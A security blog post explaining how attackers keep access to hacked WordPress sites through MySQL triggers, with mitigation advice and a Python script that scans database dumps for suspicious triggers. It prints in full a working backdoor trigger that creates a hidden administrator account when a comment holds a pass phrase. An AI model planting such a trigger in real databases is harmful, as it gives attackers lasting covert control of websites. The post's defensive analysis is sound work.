December 1 2022

Malware and backdoors on WordPress using MySQL TRIGGERs

How attackers keep access to a WordPress installation using a MySQL backdoor

Over the past year, there has been an increasing trend of WordPress malware using SQL triggers to hide malicious SQL queries inside compromised databases. These queries insert an administrator-level user into the infected database whenever the trigger condition is met.

What makes this especially problematic for website owners is that most malware cleaning guides focus on website files and on the data within specific database tables, for example wp_users, wp_options and wp_posts.

If you use a popular CMS on your website (such as WordPress), chances are you use a MySQL database to store important data such as CMS settings and content (e.g. WordPress posts). This means that anything that can modify the MySQL database can also cause serious damage to the website, such as injecting malicious content or even deleting the content of your website.

This security risk is one of the reasons why the MySQL database is assigned its own username and password (see wp-config.php): this prevents someone from remotely querying the MySQL database without the proper login information.

Since WordPress has access to these credentials via wp-config.php, it is able to read and change the database defined in that configuration file.

Unfortunately, once attackers gain unauthorized access, they can often read wp-config.php to learn the login information for the website's database, which the attacker's malware can then use to connect to the database and make malicious changes.

SQL triggers

An SQL trigger is a stored procedure that runs automatically when specific changes are made to the database.

In databases, a trigger is a procedure that is executed automatically when a specific event occurs, such as the deletion of a row from a table. This provides a technique for specifying and maintaining even complex integrity constraints: since a trigger is essentially a procedure written in PL/SQL (Oracle), Transact-SQL, etc., it lets users express constraints that go beyond what declarative constraints can check.

The procedure is therefore associated with a table and is called automatically by the database engine when a certain change (or event) occurs within that table. The changes that can fire a trigger are the INSERT, UPDATE and DELETE operations.

While they have many useful applications, we also have evidence that SQL triggers are used by malicious actors to maintain unauthorized access after a compromise. To do this, attackers insert an SQL trigger into a compromised website's database, and when specific criteria are met or an event occurs, the malicious stored action is executed.

For example, we found this interesting backdoor SQL trigger on the wp_comments table in the database of an infected website (shown here as mysqldump exported it, reflowed for readability):

    /*!50003 CREATE*/ /*!50017 DEFINER=`root_ext`@`%`*/ /*!50003 TRIGGER `after_insert_comment`
    AFTER INSERT ON `meccanicainnovativa`.`wp_comments`
    FOR EACH ROW
    BEGIN
      -- fires on every new row in wp_comments, approved or not
      IF NEW.comment_content LIKE '%are you struggling to get comments on your blog?%' THEN
        -- pick the next free user ID and create a user with a forged registration date
        SET @lastInsertWpUsersId = (SELECT MAX(id) FROM `meccanicainnovativa`.`wp_users`);
        SET @nextWpUsersID = @lastInsertWpUsersId + 1;
        INSERT INTO `meccanicainnovativa`.`wp_users`
          (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`,
           `user_registered`, `user_activation_key`, `user_status`, `display_name`)
        VALUES
          (@nextWpUsersID, 'wpadmin', '$1$yUXpYwXN$JhwaoGJxViPhtGdNG5UZs1', 'wpadmin',
           '[email protected]', 'http://wordpress.com', '2014-06-08 00:00:00', '', '0', 'Kris');
        -- grant the new user the administrator role and the highest user level
        INSERT INTO `meccanicainnovativa`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`)
        VALUES (NULL, @nextWpUsersID, 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}');
        INSERT INTO `meccanicainnovativa`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`)
        VALUES (NULL, @nextWpUsersID, 'wp_user_level', '10');
      END IF;
    END */;;

This SQL trigger creates a malicious admin user whenever a new comment containing the code words 'are you struggling to get comments on your blog?' is submitted on the infected WordPress website.

The trigger checks the comment_content column of the wp_comments table, so it does not matter whether the comment is approved or pending. Once the trigger fires, it inserts a malicious admin user wpadmin with a forged registration date of 2014-06-08 and the email address [email protected].

Conclusion and mitigation steps

When a website has been compromised, you can bet that attackers will be looking for any database credentials found in wp-config or other CMS configuration files, and it can be incredibly difficult to identify whether the hacker collected this information at any point post-infection.

If a compromise occurs, passwords must be updated throughout the environment, including the databases. Neglecting this post-hack step can lead to an attacker accessing and modifying your site even after you thought you had cleaned the infection.

If you suspect that your site may have a backdoor of this type, export the database as a .sql dump and search for the string TRIGGER in the exported file.

Obviously not all TRIGGERs are backdoors: as we said before, TRIGGERs are useful and legitimate tools. However, it is also true that the use of TRIGGERs within WordPress installations is very rare and highly unusual, so any trigger you find deserves a close look.
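As an added example (not part of the original article), the following Python script does the check described above more thoroughly than a plain text search: it finds every CREATE TRIGGER in a mysqldump export, extracts which tables each trigger writes to, and flags triggers that write to wp_users or wp_usermeta or carry administrator capability values. The embedded dump excerpt, the database name example_db and the trigger pass phrase are constructed placeholders.

```python
import re
import sys

# Constructed mysqldump excerpt (not a real site's dump): one legitimate auditing trigger
# and one backdoor trigger of the kind shown above; example_db and the phrase are placeholders.
SAMPLE_DUMP = r"""
CREATE TABLE `wp_comments` (`comment_ID` bigint(20) NOT NULL);
DELIMITER ;;
/*!50003 CREATE*/ /*!50017 DEFINER=`wpuser`@`localhost`*/ /*!50003 TRIGGER `audit_post` AFTER UPDATE ON `wp_posts` FOR EACH ROW BEGIN INSERT INTO `wp_post_audit` (`post_id`) VALUES (NEW.ID); END */;;
/*!50003 CREATE*/ /*!50017 DEFINER=`root_ext`@`%`*/ /*!50003 TRIGGER `after_insert_comment` AFTER INSERT ON `example_db`.`wp_comments` FOR EACH ROW BEGIN IF NEW.comment_content LIKE '%placeholder pass phrase%' THEN INSERT INTO `example_db`.`wp_users` (`user_login`) VALUES ('wpadmin'); INSERT INTO `example_db`.`wp_usermeta` (`meta_key`, `meta_value`) VALUES ('wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}'); END IF; END */;;
DELIMITER ;
"""

# Header of a trigger definition as mysqldump writes it, with the body up to its final END.
TRIGGER_RE = re.compile(
    r"TRIGGER\s+`?(?P<name>\w+)`?\s+(?P<timing>BEFORE|AFTER)\s+"
    r"(?P<event>INSERT|UPDATE|DELETE)\s+ON\s+(?:`?\w+`?\.)?`?(?P<table>\w+)`?\s+"
    r"FOR\s+EACH\s+ROW\s+(?P<body>.*?END)\s*(?:\*/)?\s*;;",
    re.IGNORECASE | re.DOTALL,
)
# Target table of each write statement inside a trigger body (schema prefix ignored).
WRITE_RE = re.compile(
    r"(?:INSERT\s+INTO|UPDATE|DELETE\s+FROM)\s+(?:`?\w+`?\.)?`?(\w+)`?", re.IGNORECASE
)
# A trigger that writes to these tables, or mentions these values, can create or promote accounts.
SENSITIVE_TABLES = ("wp_users", "wp_usermeta")
SENSITIVE_WORDS = ("wp_capabilities", "wp_user_level", "administrator")


def find_triggers(dump_text):
    """Return one dict per CREATE TRIGGER found in a mysqldump export."""
    found = []
    for m in TRIGGER_RE.finditer(dump_text):
        body = m.group("body")
        writes = sorted({t.lower() for t in WRITE_RE.findall(body)})
        reasons = [t for t in SENSITIVE_TABLES if t in writes]
        reasons += [w for w in SENSITIVE_WORDS if w in body.lower()]
        found.append({"name": m.group("name"), "table": m.group("table"),
                      "event": f"{m.group('timing')} {m.group('event')}".upper(),
                      "writes": writes, "suspicious": bool(reasons), "reasons": reasons})
    return found


if __name__ == "__main__":  # usage: python scan_triggers.py backup.sql (no argument: sample)
    text = open(sys.argv[1], errors="replace").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    for t in find_triggers(text):
        status = "SUSPICIOUS" if t["suspicious"] else "ok"
        print(f"[{status}] {t['name']}: {t['event']} ON {t['table']} -> writes {t['writes']} {t['reasons']}")
```

On a live server the same inventory comes from the information_schema.TRIGGERS view (TRIGGER_NAME, EVENT_OBJECT_TABLE, DEFINER, ACTION_STATEMENT), and a confirmed backdoor is removed with DROP TRIGGER followed by the credential rotation described above.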

Hacked website owners can refer to our service on how to clean a hacked website for steps to clean up the infection. If you need a hand, we can help you clean up any malware and backdoors and secure your site.
